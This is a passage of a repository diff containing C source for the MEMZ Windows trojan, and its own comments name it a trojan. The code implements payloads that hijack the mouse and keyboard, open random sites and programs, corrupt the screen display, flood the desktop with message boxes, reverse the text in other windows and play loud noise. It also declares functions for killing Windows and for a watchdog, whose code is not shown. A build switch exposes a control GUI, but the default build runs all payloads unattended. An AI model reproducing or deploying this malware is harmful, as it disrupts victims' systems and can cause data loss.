LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
PAINTSTRUCT ps;
HDC hdc;
if (msg == WM_ACTIVATE) {
if (wParam == NULL)
dialog = NULL;
else
dialog = hwnd;
} else if (msg == WM_DESTROY) {
ExitProcess(0);
} else if (msg == WM_COMMAND) {
if (wParam == BN_CLICKED && SendMessage((HWND)lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
for (int p = 0; p < nPayloads; p++) {
if (payloads[p].btn == (HWND)lParam && !payloads[p].safe) {
SendMessage((HWND)lParam, BM_SETCHECK, BST_UNCHECKED, NULL);
// Most ugly formatting EVER
if (MessageBoxA(hwnd,
"This payload is considered semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\
If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \
virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\
Do you still want to enable it?",
"MEMZ", MB_YESNO | MB_ICONWARNING) == IDYES) {
SendMessage((HWND)lParam, BM_SETCHECK, BST_CHECKED, NULL);
}
}
}
}
} else if (msg == WM_PAINT) {
hdc = BeginPaint(hwnd, &ps);
SelectObject(hdc, font);
LPWSTR str;
LPWSTR state = enablePayloads ? L"ENABLED" : L"DISABLED";
FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY,
L"Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!", 0, 0, (LPWSTR)&str, 1024, (va_list*)&state);
TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str));
TextOut(hdc, 10, WINDOWHEIGHT - 20, L"Press CTRL+SHIFT+S to skip some time (makes some payloads faster)", 65);
EndPaint(hwnd, &ps);
} else {
return DefWindowProc(hwnd, msg, wParam, lParam);
}
return 0;
}
DWORD WINAPI keyboardThread(LPVOID lParam) {
for (;;) {
if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {
enablePayloads = !enablePayloads;
if (!enablePayloads) {
RECT rect;
HWND desktop = GetDesktopWindow();
GetWindowRect(desktop, &rect);
RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN);
EnumWindows(&CleanWindowsProc, NULL);
} else {
RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE);
}
while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {
Sleep(100);
}
} else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState('S')) & 0x8000) {
if (enablePayloads) {
for (int p = 0; p < nPayloads; p++) {
if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
payloads[p].delay = ((PAYLOADFUNCTIONDEFAULT((*)))payloads[p].payloadFunction)(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE);
}
}
}
}
Sleep(10);
}
return 0;
}
BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam) {
DWORD pid;
if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) {
SendMessage(hwnd, WM_CLOSE, 0, 0);
}
return TRUE;
}
#endif

128
VCProject/MEMZ/memz.h → WindowsTrojan/MEMZ/memz.h
View file

@ -1,65 +1,65 @@
// If this is defined, the trojan will disable all destructive payloads
// and does display a GUI to manually control all of the non-destructive ones.
//#define CLEAN
#ifdef CLEAN
// Enable XP styles
#pragma comment(linker,"\"/manifestdependency:type='win32' \
name='Microsoft.Windows.Common-Controls' version='6.0.0.0' \
processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"")
// Window attributes
#define BTNWIDTH 200
#define BTNHEIGHT 30
#define COLUMNS 3
#define ROWS ((nPayloads + nPayloads%COLUMNS)/COLUMNS)
#define SPACE 10
#define WINDOWWIDTH COLUMNS * BTNWIDTH + (COLUMNS + 1)*SPACE
#define WINDOWHEIGHT ROWS * BTNHEIGHT + (ROWS + 1)*SPACE + 32
#endif
#pragma once
#include <Windows.h>
#include <TlHelp32.h>
#include <Shlwapi.h>
#include <Psapi.h>
#include <CommCtrl.h>
#include "data.h"
#include "payloads.h"
int random();
void strReverseW(LPWSTR str);
PAYLOADHOST(payloadHostDefault);
PAYLOADHOST(payloadHostVisual);
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);
#ifndef CLEAN
void killWindows();
void killWindowsInstant();
DWORD WINAPI ripMessageThread(LPVOID);
DWORD WINAPI watchdogThread(LPVOID);
#else
DWORD WINAPI keyboardThread(LPVOID lParam);
extern BOOLEAN enablePayloads;
BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam);
#endif
PAYLOADFUNCTIONDEFAULT(payloadExecute);
PAYLOADFUNCTIONDEFAULT(payloadCursor);
PAYLOADFUNCTIONVISUAL(payloadInvert);
PAYLOADFUNCTIONDEFAULT(payloadMessageBox);
DWORD WINAPI messageBoxThread(LPVOID);
LRESULT CALLBACK msgBoxHook(int, WPARAM, LPARAM);
PAYLOADFUNCTIONDEFAULT(payloadReverseText);
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam);
PAYLOADFUNCTIONDEFAULT(payloadSound);
PAYLOADFUNCTIONVISUAL(payloadGlitches);
PAYLOADFUNCTIONDEFAULT(payloadKeyboard);
PAYLOADFUNCTIONVISUAL(payloadTunnel);
PAYLOADFUNCTIONVISUAL(payloadDrawErrors);
// If this is defined, the trojan will disable all destructive payloads
// and does display a GUI to manually control all of the non-destructive ones.
//#define CLEAN
#ifdef CLEAN
// Enable XP styles
#pragma comment(linker,"\"/manifestdependency:type='win32' \
name='Microsoft.Windows.Common-Controls' version='6.0.0.0' \
processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"")
// Window attributes
#define BTNWIDTH 200
#define BTNHEIGHT 30
#define COLUMNS 3
#define ROWS ((nPayloads + nPayloads%COLUMNS)/COLUMNS)
#define SPACE 10
#define WINDOWWIDTH COLUMNS * BTNWIDTH + (COLUMNS + 1)*SPACE
#define WINDOWHEIGHT ROWS * BTNHEIGHT + (ROWS + 1)*SPACE + 32
#endif
#pragma once
#include <Windows.h>
#include <TlHelp32.h>
#include <Shlwapi.h>
#include <Psapi.h>
#include <CommCtrl.h>
#include "data.h"
#include "payloads.h"
int random();
void strReverseW(LPWSTR str);
PAYLOADHOST(payloadHostDefault);
PAYLOADHOST(payloadHostVisual);
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);
#ifndef CLEAN
void killWindows();
void killWindowsInstant();
DWORD WINAPI ripMessageThread(LPVOID);
DWORD WINAPI watchdogThread(LPVOID);
#else
DWORD WINAPI keyboardThread(LPVOID lParam);
extern BOOLEAN enablePayloads;
BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam);
#endif
PAYLOADFUNCTIONDEFAULT(payloadExecute);
PAYLOADFUNCTIONDEFAULT(payloadCursor);
PAYLOADFUNCTIONVISUAL(payloadInvert);
PAYLOADFUNCTIONDEFAULT(payloadMessageBox);
DWORD WINAPI messageBoxThread(LPVOID);
LRESULT CALLBACK msgBoxHook(int, WPARAM, LPARAM);
PAYLOADFUNCTIONDEFAULT(payloadReverseText);
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam);
PAYLOADFUNCTIONDEFAULT(payloadSound);
PAYLOADFUNCTIONVISUAL(payloadGlitches);
PAYLOADFUNCTIONDEFAULT(payloadKeyboard);
PAYLOADFUNCTIONVISUAL(payloadTunnel);
PAYLOADFUNCTIONVISUAL(payloadDrawErrors);
PAYLOADHOST(payloadHostCrazyBus);

598
VCProject/MEMZ/payloads.cpp → WindowsTrojan/MEMZ/payloads.cpp
View file

@ -1,300 +1,300 @@
#include "memz.h"
PAYLOAD payloads[] = {
#ifdef CLEAN
{ payloadHostDefault, (LPVOID)payloadExecute, L"Open random websites/programs", FALSE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadCursor, L"Random cursor movement", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadKeyboard, L"Random keyboard input", FALSE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadSound, L"Random error sounds", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadInvert, L"Invert Screen", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadMessageBox, L"Message boxes", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadDrawErrors, L"Draw error icons", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadReverseText, L"Reverse text", FALSE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadTunnel, L"Tunnel effect", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadGlitches, L"Screen glitches", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostCrazyBus, NULL, L"Crazy Bus (Ear Rape)", TRUE, 0, 0, 0, 0, 0 },
#else
{ payloadHostDefault, (LPVOID)payloadExecute, 30000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadCursor, 30000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadKeyboard, 20000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadSound, 50000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadInvert, 30000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadMessageBox, 20000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadDrawErrors, 10000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadReverseText, 40000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadTunnel, 60000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadGlitches, 15000, 0, 0, 0, 0 },
{ payloadHostCrazyBus, NULL, 1000, 0, 0, 0, 0 },
#endif
};
const size_t nPayloads = sizeof(payloads) / sizeof(PAYLOAD);
BOOLEAN enablePayloads = TRUE;
PAYLOADHOST(payloadHostDefault) {
PAYLOAD *payload = (PAYLOAD*)parameter;
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
if (payload->delaytime++ >= payload->delay) {
#ifdef CLEAN
payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE);
#else
payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime);
#endif
payload->delaytime = 0;
}
payload->runtime++;
#ifdef CLEAN
} else {
payload->runtime = 0;
payload->times = 0;
payload->delay = 0;
}
#endif
Sleep(10);
}
}
PAYLOADHOST(payloadHostVisual) {
PAYLOAD *payload = (PAYLOAD*)parameter;
HWND hwnd = GetDesktopWindow();
HDC hdc = GetWindowDC(hwnd);
RECT rekt;
GetWindowRect(hwnd, &rekt);
int w = rekt.right - rekt.left;
int h = rekt.bottom - rekt.top;
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
if (payload->delaytime++ >= payload->delay) {
#ifdef CLEAN
payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE, hwnd, hdc, &rekt, w, h);
#else
payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, hwnd, hdc, &rekt, w, h);
#endif
payload->delaytime = 0;
}
payload->runtime++;
#ifdef CLEAN
}
else {
payload->runtime = 0;
payload->times = 0;
payload->delay = 0;
}
#endif
Sleep(10);
}
}
PAYLOADFUNCTIONDEFAULT(payloadExecute) {
PAYLOADHEAD
ShellExecuteA(NULL, "open", (LPCSTR)sites[random() % nSites], NULL, NULL, SW_SHOWDEFAULT);
out: return 1500.0 / (times / 15.0 + 1) + 100 + (random() % 200);
}
PAYLOADFUNCTIONVISUAL(payloadInvert) {
PAYLOADHEAD
BitBlt(hdc, 0, 0, w, h, hdc, 0, 0, NOTSRCCOPY);
out: return 100;
}
PAYLOADFUNCTIONDEFAULT(payloadCursor) {
PAYLOADHEAD
POINT cursor;
GetCursorPos(&cursor);
SetCursorPos(cursor.x + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)), cursor.y + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)));
out: return 2;
}
PAYLOADFUNCTIONDEFAULT(payloadMessageBox) {
PAYLOADHEAD
CreateThread(NULL, 4096, &messageBoxThread, NULL, NULL, NULL);
out: return 2000.0 / (times / 8.0 + 1) + 20 + (random() % 30);
}
DWORD WINAPI messageBoxThread(LPVOID parameter) {
HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
MessageBoxW(NULL, L"Still using this computer?", L"lol", MB_SYSTEMMODAL | MB_OK | MB_ICONWARNING);
UnhookWindowsHookEx(hook);
return 0;
}
LRESULT CALLBACK msgBoxHook(int nCode, WPARAM wParam, LPARAM lParam) {
if (nCode == HCBT_CREATEWND) {
CREATESTRUCT *pcs = ((CBT_CREATEWND *)lParam)->lpcs;
if ((pcs->style & WS_DLGFRAME) || (pcs->style & WS_POPUP)) {
HWND hwnd = (HWND)wParam;
int x = random() % (GetSystemMetrics(SM_CXSCREEN) - pcs->cx);
int y = random() % (GetSystemMetrics(SM_CYSCREEN) - pcs->cy);
pcs->x = x;
pcs->y = y;
}
}
return CallNextHookEx(0, nCode, wParam, lParam);
}
PAYLOADFUNCTIONDEFAULT(payloadReverseText) {
PAYLOADHEAD
EnumChildWindows(GetDesktopWindow(), &EnumChildProc, NULL);
out: return 50;
}
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam) {
LPWSTR str = (LPWSTR)GlobalAlloc(GMEM_ZEROINIT, sizeof(WCHAR) * 8192);
if (SendMessageTimeoutW(hwnd, WM_GETTEXT, 8192, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL)) {
strReverseW(str);
SendMessageTimeoutW(hwnd, WM_SETTEXT, NULL, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL);
}
GlobalFree(str);
return TRUE;
}
PAYLOADFUNCTIONDEFAULT(payloadSound) {
PAYLOADHEAD
// There seems to be a bug where toggling ALL payloads kills the sound output on some systems.
// I don't know why this happens, but using SND_SYNC seems to fix the bug.
// But the sound is not not as fast as before. I hope there is another way to fix it without slowing down the payload.
// As this only happens for the enable-disable part, I will only include that in the clean build as a workaround.
#ifdef CLEAN
PlaySoundA(sounds[random() % nSounds], GetModuleHandle(NULL), SND_SYNC);
out: return random() % 10;
#else
PlaySoundA(sounds[random() % nSounds], GetModuleHandle(NULL), SND_ASYNC);
out: return 20 + (random() % 20);
#endif
}
PAYLOADFUNCTIONVISUAL(payloadGlitches) {
PAYLOADHEAD
int x1 = random() % (w - 400);
int y1 = random() % (h - 400);
int x2 = random() % (w - 400);
int y2 = random() % (h - 400);
int width = random() % 400;
int height = random() % 400;
BitBlt(hdc, x1, y1, width, height, hdc, x2, y2, SRCCOPY);
out: return 200.0 / (times / 5.0 + 1) + 3;
}
PAYLOADFUNCTIONDEFAULT(payloadKeyboard) {
PAYLOADHEAD
INPUT input;
input.type = INPUT_KEYBOARD;
input.ki.wVk = (random() % (0x5a - 0x30)) + 0x30;
SendInput(1, &input, sizeof(INPUT));
out: return 300 + (random() % 400);
}
PAYLOADFUNCTIONVISUAL(payloadTunnel) {
PAYLOADHEAD
StretchBlt(hdc, 50, 50, w - 100, h - 100, hdc, 0, 0, w, h, SRCCOPY);
out: return 200.0 / (times / 5.0 + 1) + 4;
}
PAYLOADFUNCTIONVISUAL(payloadDrawErrors) {
PAYLOADHEAD
int ix = GetSystemMetrics(SM_CXICON) / 2;
int iy = GetSystemMetrics(SM_CYICON) / 2;
POINT cursor;
GetCursorPos(&cursor);
DrawIcon(hdc, cursor.x - ix, cursor.y - iy, LoadIcon(NULL, IDI_ERROR));
if (random() % (int)(10/(times/500.0+1)+1) == 0) {
DrawIcon(hdc, random()%(w-ix), random()%(h-iy), LoadIcon(NULL, IDI_WARNING));
}
out: return 2;
}
PAYLOADHOST(payloadHostCrazyBus) {
PAYLOAD *payload = (PAYLOAD*)parameter;
WAVEFORMATEX fmt = { WAVE_FORMAT_PCM, 1, 44100, 44100, 1, 8, 0 };
HWAVEOUT hwo;
waveOutOpen(&hwo, WAVE_MAPPER, &fmt, NULL, NULL, CALLBACK_NULL);
const int bufsize = 44100 * 30; // 30 Seconds
char *wavedata = (char *)LocalAlloc(0, bufsize);
WAVEHDR hdr = { wavedata, bufsize, 0, 0, 0, 0, 0, 0 };
waveOutPrepareHeader(hwo, &hdr, sizeof(hdr));
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
int freq = 0;
for (int i = 0; i < bufsize; i++) {
if (i % (44100 / 4) == 0)
freq = 44100 / ((random() % 4000) + 1000);
wavedata[i] = (char)(((i % freq) / ((float)freq)) * 100);
}
#ifdef CLEAN
waveOutReset(hwo);
#endif
waveOutWrite(hwo, &hdr, sizeof(hdr));
while (!(hdr.dwFlags & WHDR_DONE)
#ifdef CLEAN
&& (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED)
#endif
) {
Sleep(1);
}
#ifdef CLEAN
if (!enablePayloads || SendMessage(payload->btn, BM_GETCHECK, 0, NULL) != BST_CHECKED) {
waveOutPause(hwo);
}
} else {
Sleep(10);
}
#endif
}
#include "memz.h"
PAYLOAD payloads[] = {
#ifdef CLEAN
{ payloadHostDefault, (LPVOID)payloadExecute, L"Open random websites/programs", FALSE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadCursor, L"Random cursor movement", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadKeyboard, L"Random keyboard input", FALSE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadSound, L"Random error sounds", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadInvert, L"Invert Screen", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadMessageBox, L"Message boxes", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadDrawErrors, L"Draw error icons", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadReverseText, L"Reverse text", FALSE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadTunnel, L"Tunnel effect", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadGlitches, L"Screen glitches", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostCrazyBus, NULL, L"Crazy Bus (Ear Rape)", TRUE, 0, 0, 0, 0, 0 },
#else
{ payloadHostDefault, (LPVOID)payloadExecute, 30000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadCursor, 30000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadKeyboard, 20000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadSound, 50000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadInvert, 30000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadMessageBox, 20000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadDrawErrors, 10000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadReverseText, 40000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadTunnel, 60000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadGlitches, 15000, 0, 0, 0, 0 },
{ payloadHostCrazyBus, NULL, 1000, 0, 0, 0, 0 },
#endif
};
const size_t nPayloads = sizeof(payloads) / sizeof(PAYLOAD);
BOOLEAN enablePayloads = TRUE;
PAYLOADHOST(payloadHostDefault) {
PAYLOAD *payload = (PAYLOAD*)parameter;
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
if (payload->delaytime++ >= payload->delay) {
#ifdef CLEAN
payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE);
#else
payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime);
#endif
payload->delaytime = 0;
}
payload->runtime++;
#ifdef CLEAN
} else {
payload->runtime = 0;
payload->times = 0;
payload->delay = 0;
}
#endif
Sleep(10);
}
}
PAYLOADHOST(payloadHostVisual) {
PAYLOAD *payload = (PAYLOAD*)parameter;
HWND hwnd = GetDesktopWindow();
HDC hdc = GetWindowDC(hwnd);
RECT rekt;
GetWindowRect(hwnd, &rekt);
int w = rekt.right - rekt.left;
int h = rekt.bottom - rekt.top;
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
if (payload->delaytime++ >= payload->delay) {
#ifdef CLEAN
payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE, hwnd, hdc, &rekt, w, h);
#else
payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, hwnd, hdc, &rekt, w, h);
#endif
payload->delaytime = 0;
}
payload->runtime++;
#ifdef CLEAN
}
else {
payload->runtime = 0;
payload->times = 0;
payload->delay = 0;
}
#endif
Sleep(10);
}
}
PAYLOADFUNCTIONDEFAULT(payloadExecute) {
PAYLOADHEAD
ShellExecuteA(NULL, "open", (LPCSTR)sites[random() % nSites], NULL, NULL, SW_SHOWDEFAULT);
out: return 1500.0 / (times / 15.0 + 1) + 100 + (random() % 200);
}
PAYLOADFUNCTIONVISUAL(payloadInvert) {
PAYLOADHEAD
BitBlt(hdc, 0, 0, w, h, hdc, 0, 0, NOTSRCCOPY);
out: return 100;
}
PAYLOADFUNCTIONDEFAULT(payloadCursor) {
PAYLOADHEAD
POINT cursor;
GetCursorPos(&cursor);
SetCursorPos(cursor.x + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)), cursor.y + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)));
out: return 2;
}
PAYLOADFUNCTIONDEFAULT(payloadMessageBox) {
PAYLOADHEAD
CreateThread(NULL, 4096, &messageBoxThread, NULL, NULL, NULL);
out: return 2000.0 / (times / 8.0 + 1) + 20 + (random() % 30);
}
DWORD WINAPI messageBoxThread(LPVOID parameter) {
HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
MessageBoxW(NULL, L"Still using this computer?", L"lol", MB_SYSTEMMODAL | MB_OK | MB_ICONWARNING);
UnhookWindowsHookEx(hook);
return 0;
}
LRESULT CALLBACK msgBoxHook(int nCode, WPARAM wParam, LPARAM lParam) {
if (nCode == HCBT_CREATEWND) {
CREATESTRUCT *pcs = ((CBT_CREATEWND *)lParam)->lpcs;
if ((pcs->style & WS_DLGFRAME) || (pcs->style & WS_POPUP)) {
HWND hwnd = (HWND)wParam;
int x = random() % (GetSystemMetrics(SM_CXSCREEN) - pcs->cx);
int y = random() % (GetSystemMetrics(SM_CYSCREEN) - pcs->cy);
pcs->x = x;
pcs->y = y;
}
}
return CallNextHookEx(0, nCode, wParam, lParam);
}
PAYLOADFUNCTIONDEFAULT(payloadReverseText) {
PAYLOADHEAD
EnumChildWindows(GetDesktopWindow(), &EnumChildProc, NULL);
out: return 50;
}
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam) {
LPWSTR str = (LPWSTR)GlobalAlloc(GMEM_ZEROINIT, sizeof(WCHAR) * 8192);
if (SendMessageTimeoutW(hwnd, WM_GETTEXT, 8192, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL)) {
strReverseW(str);
SendMessageTimeoutW(hwnd, WM_SETTEXT, NULL, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL);
}
GlobalFree(str);
return TRUE;
}
PAYLOADFUNCTIONDEFAULT(payloadSound) {
PAYLOADHEAD
// There seems to be a bug where toggling ALL payloads kills the sound output on some systems.
// I don't know why this happens, but using SND_SYNC seems to fix the bug.
// But the sound is not not as fast as before. I hope there is another way to fix it without slowing down the payload.
// As this only happens for the enable-disable part, I will only include that in the clean build as a workaround.
#ifdef CLEAN
PlaySoundA(sounds[random() % nSounds], GetModuleHandle(NULL), SND_SYNC);
out: return random() % 10;
#else
PlaySoundA(sounds[random() % nSounds], GetModuleHandle(NULL), SND_ASYNC);
out: return 20 + (random() % 20);
#endif
}
PAYLOADFUNCTIONVISUAL(payloadGlitches) {
PAYLOADHEAD
int x1 = random() % (w - 400);
int y1 = random() % (h - 400);
int x2 = random() % (w - 400);
int y2 = random() % (h - 400);
int width = random() % 400;
int height = random() % 400;
BitBlt(hdc, x1, y1, width, height, hdc, x2, y2, SRCCOPY);
out: return 200.0 / (times / 5.0 + 1) + 3;
}
PAYLOADFUNCTIONDEFAULT(payloadKeyboard) {
PAYLOADHEAD
INPUT input;
input.type = INPUT_KEYBOARD;
input.ki.wVk = (random() % (0x5a - 0x30)) + 0x30;
SendInput(1, &input, sizeof(INPUT));
out: return 300 + (random() % 400);
}
PAYLOADFUNCTIONVISUAL(payloadTunnel) {
PAYLOADHEAD
StretchBlt(hdc, 50, 50, w - 100, h - 100, hdc, 0, 0, w, h, SRCCOPY);
out: return 200.0 / (times / 5.0 + 1) + 4;
}
PAYLOADFUNCTIONVISUAL(payloadDrawErrors) {
PAYLOADHEAD
int ix = GetSystemMetrics(SM_CXICON) / 2;
int iy = GetSystemMetrics(SM_CYICON) / 2;
POINT cursor;
GetCursorPos(&cursor);
DrawIcon(hdc, cursor.x - ix, cursor.y - iy, LoadIcon(NULL, IDI_ERROR));
if (random() % (int)(10/(times/500.0+1)+1) == 0) {
DrawIcon(hdc, random()%(w-ix), random()%(h-iy), LoadIcon(NULL, IDI_WARNING));
}
out: return 2;
}
PAYLOADHOST(payloadHostCrazyBus) {
PAYLOAD *payload = (PAYLOAD*)parameter;
WAVEFORMATEX fmt = { WAVE_FORMAT_PCM, 1, 44100, 44100, 1, 8, 0 };
HWAVEOUT hwo;
waveOutOpen(&hwo, WAVE_MAPPER, &fmt, NULL, NULL, CALLBACK_NULL);
const int bufsize = 44100 * 30; // 30 Seconds
char *wavedata = (char *)LocalAlloc(0, bufsize);
WAVEHDR hdr = { wavedata, bufsize, 0, 0, 0, 0, 0, 0 };
waveOutPrepareHeader(hwo, &hdr, sizeof(hdr));
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
int freq = 0;
for (int i = 0; i < bufsize; i++) {
if (i % (44100 / 4) == 0)
freq = 44100 / ((random() % 4000) + 1000);
wavedata[i] = (char)(((i % freq) / ((float)freq)) * 100);
}
#ifdef CLEAN
waveOutReset(hwo);
#endif
waveOutWrite(hwo, &hdr, sizeof(hdr));
while (!(hdr.dwFlags & WHDR_DONE)
#ifdef CLEAN
&& (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED)
#endif
) {
Sleep(1);
}
#ifdef CLEAN
if (!enablePayloads || SendMessage(payload->btn, BM_GETCHECK, 0, NULL) != BST_CHECKED) {
waveOutPause(hwo);
}
} else {
Sleep(10);
}
#endif
}
}

64
VCProject/MEMZ/payloads.h → WindowsTrojan/MEMZ/payloads.h
View file

@ -1,33 +1,33 @@
#pragma once
#include "memz.h"
#define PAYLOADHOST(name) DWORD (WINAPI name)(LPVOID parameter)
typedef struct {
PAYLOADHOST(*payloadHost);
void *payloadFunction;
#ifdef CLEAN
wchar_t *name;
BOOLEAN safe;
HWND btn;
int delaytime, delay, runtime, times;
#else
int startDelay;
int delaytime, delay, runtime, times;
#endif
} PAYLOAD;
#ifdef CLEAN
#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime, BOOLEAN skip)
#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, BOOLEAN skip, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
#define PAYLOADHEAD if (skip) goto out;
#else
#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime)
#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
#define PAYLOADHEAD
#endif
extern PAYLOAD payloads[];
#pragma once
#include "memz.h"
#define PAYLOADHOST(name) DWORD (WINAPI name)(LPVOID parameter)
typedef struct {
PAYLOADHOST(*payloadHost);
void *payloadFunction;
#ifdef CLEAN
wchar_t *name;
BOOLEAN safe;
HWND btn;
int delaytime, delay, runtime, times;
#else
int startDelay;
int delaytime, delay, runtime, times;
#endif
} PAYLOAD;
#ifdef CLEAN
#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime, BOOLEAN skip)
#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, BOOLEAN skip, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
#define PAYLOADHEAD if (skip) goto out;
#else
